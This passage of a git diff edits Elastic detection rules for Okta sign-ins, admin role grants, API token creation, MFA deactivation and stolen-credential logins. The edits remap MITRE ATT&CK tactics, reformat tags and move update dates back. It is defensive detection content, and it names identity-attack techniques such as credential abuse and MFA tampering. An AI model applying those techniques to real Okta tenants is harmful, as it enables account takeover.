+[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/integrations/okta/initial_access_sign_in_events_via_third_party_idp.toml b/rules/integrations/okta/initial_access_sign_in_events_via_third_party_idp.toml index dfa658d7dcd..3980b66a6b4 100644 --- a/rules/integrations/okta/initial_access_sign_in_events_via_third_party_idp.toml +++ b/rules/integrations/okta/initial_access_sign_in_events_via_third_party_idp.toml @@ -2,7 +2,7 @@ creation_date = "2023/11/06" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/09" [rule] author = ["Elastic"] @@ -68,7 +68,13 @@ references = [ risk_score = 47 rule_id = "1ceb05c4-7d25-11ee-9562-f661ea17fbcd" severity = "medium" -tags = ["Domain: Identity", "Use Case: Identity and Access Audit", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Okta", "Resources: Investigation Guide"] +tags = [ + "Domain: Identity", + "Use Case: Identity and Access Audit", + "Tactic: Initial Access", + "Data Source: Okta", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" @@ -105,36 +111,14 @@ value = "now-5d" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" +id = "T1199" +name = "Trusted Relationship" +reference = "https://attack.mitre.org/techniques/T1199/" -[[rule.threat.technique.subtechnique]] -id = "T1556.007" -name = "Hybrid Identity" -reference = "https://attack.mitre.org/techniques/T1556/007/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" - -[[rule.threat.technique.subtechnique]] -id = "T1556.007" -name = "Hybrid Identity" -reference = "https://attack.mitre.org/techniques/T1556/007/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/okta/initial_access_successful_application_sso_from_unknown_client_device.toml b/rules/integrations/okta/initial_access_successful_application_sso_from_unknown_client_device.toml index 8f3817af63a..2a87b962d34 100644 --- a/rules/integrations/okta/initial_access_successful_application_sso_from_unknown_client_device.toml +++ b/rules/integrations/okta/initial_access_successful_application_sso_from_unknown_client_device.toml @@ -2,7 +2,7 @@ creation_date = "2024/10/07" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] author = ["Elastic"] @@ -57,7 +57,14 @@ references = ["https://trust.okta.com/security-advisories/okta-classic-applicati risk_score = 47 rule_id = "1502a836-84b2-11ef-b026-f661ea17fbcc" severity = "medium" -tags = ["Domain: SaaS", "Tactic: Defense Evasion", "Tactic: Initial Access", "Data Source: Okta", "Use Case: Threat Detection", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: SaaS", + "Data Source: Okta", + "Use Case: Threat Detection", + "Use Case: Identity and Access Audit", + "Tactic: Initial Access", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" @@ -71,39 +78,17 @@ event.dataset: "okta.system" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [rule.new_terms] field = "new_terms_fields" value = ["client.user.name", "okta.client.user_agent.raw_user_agent"] diff --git a/rules/integrations/okta/initial_access_suspicious_activity_reported_by_okta_user.toml b/rules/integrations/okta/initial_access_suspicious_activity_reported_by_okta_user.toml index e85d24507ef..3cee4601d83 100644 --- a/rules/integrations/okta/initial_access_suspicious_activity_reported_by_okta_user.toml +++ b/rules/integrations/okta/initial_access_suspicious_activity_reported_by_okta_user.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/21" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] author = ["Elastic"] @@ -78,3 +78,52 @@ event.dataset:okta.system and event.action:user.account.report_suspicious_activi ''' +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/okta/lateral_movement_multiple_sessions_for_single_user.toml b/rules/integrations/okta/lateral_movement_multiple_sessions_for_single_user.toml index b81063de51f..fdf12c3e90b 100644 --- a/rules/integrations/okta/lateral_movement_multiple_sessions_for_single_user.toml +++ b/rules/integrations/okta/lateral_movement_multiple_sessions_for_single_user.toml @@ -2,7 +2,7 @@ creation_date = "2023/11/07" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] author = ["Elastic"] @@ -68,7 +68,12 @@ references = [ risk_score = 47 rule_id = "621e92b6-7e54-11ee-bdc0-f661ea17fbcd" severity = "medium" -tags = ["Use Case: Identity and Access Audit", "Tactic: Defense Evasion", "Data Source: Okta", "Resources: Investigation Guide"] +tags = [ + "Use Case: Identity and Access Audit", + "Data Source: Okta", + "Tactic: Lateral Movement", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "threshold" @@ -82,21 +87,22 @@ event.dataset:okta.system [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" - [[rule.threat.technique.subtechnique]] id = "T1550.004" name = "Web Session Cookie" reference = "https://attack.mitre.org/techniques/T1550/004/" + + [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + [rule.threshold] field = ["okta.actor.id"] value = 1 diff --git a/rules/integrations/okta/okta_threatinsight_threat_suspected_promotion.toml b/rules/integrations/okta/okta_threatinsight_threat_suspected_promotion.toml index d58958991d7..efa11cf5d96 100644 --- a/rules/integrations/okta/okta_threatinsight_threat_suspected_promotion.toml +++ b/rules/integrations/okta/okta_threatinsight_threat_suspected_promotion.toml @@ -3,7 +3,7 @@ creation_date = "2020/05/21" integration = ["okta"] maturity = "production" promotion = true -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] author = ["Elastic"] @@ -37,7 +37,7 @@ risk_score = 47 rule_id = "6885d2ae-e008-4762-b98a-e8e1cd3a81e9" rule_name_override = "okta.display_message" severity = "medium" -tags = ["Use Case: Identity and Access Audit", "Tactic: Credential Access", "Data Source: Okta", "Resources: Investigation Guide"] +tags = ["Use Case: Identity and Access Audit", "Data Source: Okta", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -65,31 +65,3 @@ severity = "high" value = "HIGH" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1110" -name = "Brute Force" -reference = "https://attack.mitre.org/techniques/T1110/" - -[[rule.threat.technique.subtechnique]] -id = "T1110.001" -name = "Password Guessing" -reference = "https://attack.mitre.org/techniques/T1110/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1110.003" -name = "Password Spraying" -reference = "https://attack.mitre.org/techniques/T1110/003/" - -[[rule.threat.technique.subtechnique]] -id = "T1110.004" -name = "Credential Stuffing" -reference = "https://attack.mitre.org/techniques/T1110/004/" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/integrations/okta/persistence_administrator_privileges_assigned_to_okta_group.toml b/rules/integrations/okta/persistence_administrator_privileges_assigned_to_okta_group.toml index 6077dd8a367..859394bc1c4 100644 --- a/rules/integrations/okta/persistence_administrator_privileges_assigned_to_okta_group.toml +++ b/rules/integrations/okta/persistence_administrator_privileges_assigned_to_okta_group.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/21" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] author = ["Elastic"] @@ -70,7 +70,12 @@ references = [ risk_score = 47 rule_id = "b8075894-0b62-46e5-977c-31275da34419" severity = "medium" -tags = ["Use Case: Identity and Access Audit", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Okta", "Resources: Investigation Guide"] +tags = [ + "Use Case: Identity and Access Audit", + "Data Source: Okta", + "Tactic: Persistence", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -81,36 +86,14 @@ event.dataset:okta.system and event.action:group.privilege.grant [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/okta/persistence_administrator_role_assigned_to_okta_user.toml b/rules/integrations/okta/persistence_administrator_role_assigned_to_okta_user.toml index 14ed0422b6f..4e3bb956cee 100644 --- a/rules/integrations/okta/persistence_administrator_role_assigned_to_okta_user.toml +++ b/rules/integrations/okta/persistence_administrator_role_assigned_to_okta_user.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/06" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/03" [rule] author = ["Elastic"] @@ -72,7 +72,14 @@ references = [ risk_score = 47 rule_id = "f06414a6-f2a4-466d-8eba-10f85e8abf71" severity = "medium" -tags = ["Domain: Identity", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Okta", "Data Source: Okta System Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Identity", + "Data Source: Okta", + "Data Source: Okta System Logs", + "Use Case: Identity and Access Audit", + "Tactic: Persistence", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -85,36 +92,14 @@ event.dataset:okta.system [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/okta/persistence_attempt_to_create_okta_api_token.toml b/rules/integrations/okta/persistence_attempt_to_create_okta_api_token.toml index b132c287c30..3d49244c971 100644 --- a/rules/integrations/okta/persistence_attempt_to_create_okta_api_token.toml +++ b/rules/integrations/okta/persistence_attempt_to_create_okta_api_token.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/21" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] author = ["Elastic"] @@ -85,18 +85,14 @@ event.dataset:okta.system and event.action:system.api_token.create [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1136" +name = "Create Account" +reference = "https://attack.mitre.org/techniques/T1136/" -[[rule.threat.technique.subtechnique]] -id = "T1098.001" -name = "Additional Cloud Credentials" -reference = "https://attack.mitre.org/techniques/T1098/001/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/integrations/okta/persistence_mfa_deactivation_with_no_reactivation.toml b/rules/integrations/okta/persistence_mfa_deactivation_with_no_reactivation.toml index f3e560d02e4..3f356b7f3ee 100644 --- a/rules/integrations/okta/persistence_mfa_deactivation_with_no_reactivation.toml +++ b/rules/integrations/okta/persistence_mfa_deactivation_with_no_reactivation.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/20" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/08" [rule] author = ["Elastic"] @@ -66,7 +66,13 @@ risk_score = 21 rule_id = "cd89602e-9db0-48e3-9391-ae3bf241acd8" setup = "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n" severity = "low" -tags = ["Use Case: Identity and Access Audit", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Okta", "Domain: Cloud", "Resources: Investigation Guide"] +tags = [ + "Tactic: Persistence", + "Use Case: Identity and Access Audit", + "Data Source: Okta", + "Domain: Cloud", + "Resources: Investigation Guide", +] type = "eql" query = ''' @@ -79,36 +85,19 @@ sequence by okta.target.id with maxspan=12h [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" - [[rule.threat.technique.subtechnique]] id = "T1556.006" name = "Multi-Factor Authentication" reference = "https://attack.mitre.org/techniques/T1556/006/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" - -[[rule.threat.technique.subtechnique]] -id = "T1556.006" -name = "Multi-Factor Authentication" -reference = "https://attack.mitre.org/techniques/T1556/006/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/integrations/okta/persistence_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml b/rules/integrations/okta/persistence_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml index 24d114ed045..b85da21efcb 100644 --- a/rules/integrations/okta/persistence_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml +++ b/rules/integrations/okta/persistence_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/01" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] author = ["Elastic"] @@ -70,7 +70,12 @@ references = [ risk_score = 47 rule_id = "cd16fb10-0261-46e8-9932-a0336278cdbe" severity = "medium" -tags = ["Use Case: Identity and Access Audit", "Tactic: Defense Evasion", "Data Source: Okta", "Resources: Investigation Guide"] +tags = [ + "Tactic: Persistence", + "Use Case: Identity and Access Audit", + "Data Source: Okta", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -81,18 +86,14 @@ event.dataset:okta.system and event.action:(application.policy.sign_on.update or [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" -[[rule.threat.technique.subtechnique]] -id = "T1556.009" -name = "Conditional Access Policies" -reference = "https://attack.mitre.org/techniques/T1556/009/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/integrations/okta/persistence_stolen_credentials_used_to_login_to_okta_account_after_mfa_reset.toml b/rules/integrations/okta/persistence_stolen_credentials_used_to_login_to_okta_account_after_mfa_reset.toml index 22ef2ee2fc5..b0edb92b585 100644 --- a/rules/integrations/okta/persistence_stolen_credentials_used_to_login_to_okta_account_after_mfa_reset.toml +++ b/rules/integrations/okta/persistence_stolen_credentials_used_to_login_to_okta_account_after_mfa_reset.toml @@ -2,7 +2,7 @@ creation_date = "2023/11/09" integration = ["endpoint", "okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] author = ["Elastic"] @@ -65,7 +65,16 @@ references = [ risk_score = 73 rule_id = "5610b192-7f18-11ee-825b-f661ea17fbcd" severity = "high" -tags = ["Use Case: Identity and Access Audit", "Tactic: Defense Evasion", "Tactic: Initial Access", "Data Source: Okta", "Data Source: Elastic Defend", "Rule Type: Higher-Order Rule", "Domain: Endpoint", "Domain: Cloud", "Resources: Investigation Guide"] +tags = [ + "Tactic: Persistence", + "Use Case: Identity and Access Audit", + "Data Source: Okta", + "Data Source: Elastic Defend", + "Rule Type: Higher-Order Rule", + "Domain: Endpoint", + "Domain: Cloud", + "Resources: Investigation Guide", +] type = "eql" query = ''' @@ -78,36 +87,19 @@ sequence by user.name with maxspan=12h [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" - [[rule.threat.technique.subtechnique]] id = "T1556.006" name = "Multi-Factor Authentication" reference = "https://attack.mitre.org/techniques/T1556/006/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/integrations/pad/privileged_access_ml_linux_high_count_privileged_process_events_by_user.toml b/rules/integrations/pad/privileged_access_ml_linux_high_count_privileged_process_events_by_user.toml index fa9852ed253..95c5b7cbd46 100644 --- a/rules/integrations/pad/privileged_access_ml_linux_high_count_privileged_process_events_by_user.toml +++ b/rules/integrations/pad/privileged_access_ml_linux_high_count_privileged_process_events_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "endpoint", "sysmon_linux"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] anomaly_threshold = 75 @@ -89,13 +89,14 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/integrations/pad/privileged_access_ml_linux_high_median_process_command_line_entropy_by_user.toml b/rules/integrations/pad/privileged_access_ml_linux_high_median_process_command_line_entropy_by_user.toml index 8147cfbf1d0..cea8bce82f4 100644 --- a/rules/integrations/pad/privileged_access_ml_linux_high_median_process_command_line_entropy_by_user.toml +++ b/rules/integrations/pad/privileged_access_ml_linux_high_median_process_command_line_entropy_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "endpoint", "sysmon_linux"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] anomaly_threshold = 75 @@ -80,22 +80,24 @@ The Privileged Access Detection integration detects privileged access activity b - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**. """ severity = "low" -tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Defense Evasion", "Resources: Investigation Guide"] +tags = [ + "Use Case: Privileged Access Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1027" -name = "Obfuscated Files or Information" -reference = "https://attack.mitre.org/techniques/T1027/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1027.010" -name = "Command Obfuscation" -reference = "https://attack.mitre.org/techniques/T1027/010/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/integrations/pad/privileged_access_ml_linux_rare_process_executed_by_user.toml b/rules/integrations/pad/privileged_access_ml_linux_rare_process_executed_by_user.toml index 0640fa21d56..c25efcf1291 100644 --- a/rules/integrations/pad/privileged_access_ml_linux_rare_process_executed_by_user.toml +++ b/rules/integrations/pad/privileged_access_ml_linux_rare_process_executed_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "endpoint", "sysmon_linux"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] anomaly_threshold = 75 @@ -88,13 +88,14 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/integrations/pad/privileged_access_ml_okta_high_sum_concurrent_sessions_by_user.toml b/rules/integrations/pad/privileged_access_ml_okta_high_sum_concurrent_sessions_by_user.toml index 35c3392fc78..225018502ae 100644 --- a/rules/integrations/pad/privileged_access_ml_okta_high_sum_concurrent_sessions_by_user.toml +++ b/rules/integrations/pad/privileged_access_ml_okta_high_sum_concurrent_sessions_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] anomaly_threshold = 75 @@ -79,30 +79,29 @@ The Privileged Access Detection integration detects privileged access activity b - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**. """ severity = "low" -tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Defense Evasion", "Tactic: Persistence", "Resources: Investigation Guide"] +tags = [ + "Use Case: Privileged Access Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/integrations/pad/privileged_access_ml_okta_rare_host_name_by_user.toml b/rules/integrations/pad/privileged_access_ml_okta_rare_host_name_by_user.toml index d3c4657a878..1387bf22786 100644 --- a/rules/integrations/pad/privileged_access_ml_okta_rare_host_name_by_user.toml +++ b/rules/integrations/pad/privileged_access_ml_okta_rare_host_name_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] anomaly_threshold = 75 @@ -89,18 +89,14 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/integrations/pad/privileged_access_ml_okta_rare_region_name_by_user.toml b/rules/integrations/pad/privileged_access_ml_okta_rare_region_name_by_user.toml index 54b379a95e8..f79d485a9c4 100644 --- a/rules/integrations/pad/privileged_access_ml_okta_rare_region_name_by_user.toml +++ b/rules/integrations/pad/privileged_access_ml_okta_rare_region_name_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] anomaly_threshold = 75 @@ -89,18 +89,14 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/integrations/pad/privileged_access_ml_okta_rare_source_ip_by_user.toml b/rules/integrations/pad/privileged_access_ml_okta_rare_source_ip_by_user.toml index 7783473fcb2..938ae0eef73 100644 --- a/rules/integrations/pad/privileged_access_ml_okta_rare_source_ip_by_user.toml +++ b/rules/integrations/pad/privileged_access_ml_okta_rare_source_ip_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] anomaly_threshold = 75 @@ -78,22 +78,24 @@ The Privileged Access Detection integration detects privileged access activity b - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**. """ severity = "low" -tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Initial Access", "Resources: Investigation Guide"] +tags = [ + "Use Case: Privileged Access Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_application_assignment_changes.toml b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_application_assignment_changes.toml index be3e4999263..f84ac248bfd 100644 --- a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_application_assignment_changes.toml +++ 